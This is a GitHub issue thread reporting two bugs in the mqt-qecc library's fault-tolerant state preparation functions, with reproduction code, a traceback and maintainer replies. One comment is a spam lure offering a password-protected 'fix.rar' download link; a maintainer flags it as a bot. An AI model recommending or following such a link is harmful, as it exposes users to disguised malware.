### ISSUE TITLE
Bug in `gate_optimal_prep_circuit` for [[4,2,2]] Code and `gate_optimal_verification_circuit` for [[6,4,2]] Code in `ft_stateprep` Module

### ISSUE THREAD

**Issue by beitom** [cda-tum/mqt-qecc#265]
### Environment information

- **OS**: Debian 12
- **mqt.qecc Version**: 1.6.1.dev17+g2719a9b
- **Python Version**: 3.11.2
- **Numpy Version**: 1.26.4

### Description

There are two bugs encountered in the `ft_stateprep` module of the `mqt.qecc` library when working with fault-tolerant state preparation circuits.

1. **Bug 1: `gate_optimal_prep_circuit` Returns `None` for [[4,2,2]] Code**

   When using the `gate_optimal_prep_circuit` function with a $[[4,2,2]]$ code, the function returns `None`, leading to an `AttributeError` when attempting to access the `.circ` attribute. The expected behavior is that this function should return a `StatePrepCircuit` object.

   Example code to reproduce:

   ```python
   from mqt.qecc import CSSCode
   from mqt.qecc.ft_stateprep import gate_optimal_prep_circuit
   import numpy as np

   n = 4
   q = CSSCode(2, np.array([[1] * n]), np.array([[1] * n]))
   non_ft_sp = gate_optimal_prep_circuit(q, zero_state=True)
   non_ft_sp.circ.draw(output="mpl", initial_state=True)
   ```

   Resulting error:

   ```python
   AttributeError: 'NoneType' object has no attribute 'circ'
   ```

2. **Bug 2: `gate_optimal_verification_circuit` Fails on [[6,4,2]] Code**

   The verification circuit generation fails when using the `gate_optimal_verification_circuit` function on a $[[6,4,2]]$ code. This leads to an `IndexError` within the library code.

   Example code to reproduce:

   ```python
   from mqt.qecc import CSSCode
   from mqt.qecc.ft_stateprep import gate_optimal_prep_circuit, gate_optimal_verification_circuit
   import numpy as np

   n = 6
   q = CSSCode(2, np.array([[1] * n]), np.array([[1] * n]))
   non_ft_sp = gate_optimal_prep_circuit(q, zero_state=True)
   gate_optimal_verification_circuit(non_ft_sp).circ.draw(output="mpl", initial_state=True)
   ```

   Resulting error:

```python
File [~/venv/lib/python3.11/site-packages/mqt/qecc/ft_stateprep/state_prep.py:83](http://psi:8888/lab/tree/venv/lib/python3.11/site-packages/mqt/qecc/ft_stateprep/state_prep.py#line=82), in StatePrepCircuit.compute_fault_set(self, num_errors, x_errors, reduce)
     69 def compute_fault_set(
     70     self, num_errors: int = 1, x_errors: bool = True, reduce: bool = True
     71 ) -> npt.NDArray[np.int8]:
     72     """Compute the fault set of the state.
     73 
     74     Args:
   (...)
     81         The fault set of the state.
     82     """
---> 83     faults = self.x_fault_sets[num_errors] if x_errors else self.z_fault_sets[num_errors]  # type: npt.NDArray[np.int8] | None
     84     if faults is not None:
     85         return faults

IndexError: list index out of range
```

### Expected behavior

- `gate_optimal_prep_circuit` should return a valid `StatePrepCircuit` object for the $[[4,2,2]]$ code.
- `gate_optimal_verification_circuit` should successfully generate a verification circuit for the $[[6,4,2]]$ code without encountering an `IndexError`.

### How to Reproduce

1. Run the provided code snippets for the $[[4,2,2]]$ and $[[6,4,2]]$ codes.
2. Observe the resulting errors in both cases.

**Comment by wolone** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by burgholzer** [comment]
Thanks for the report!

@pehamTom should be able to comment here.

Btw: don't know what's up with these spam bots today. Encountered multiple instances across repositories already.. reported and blocked all of them so far.

**Comment by pehamTom** [comment]
Thanks for pointing this out. This shouldn't be happening of course. I will fix it immediately.
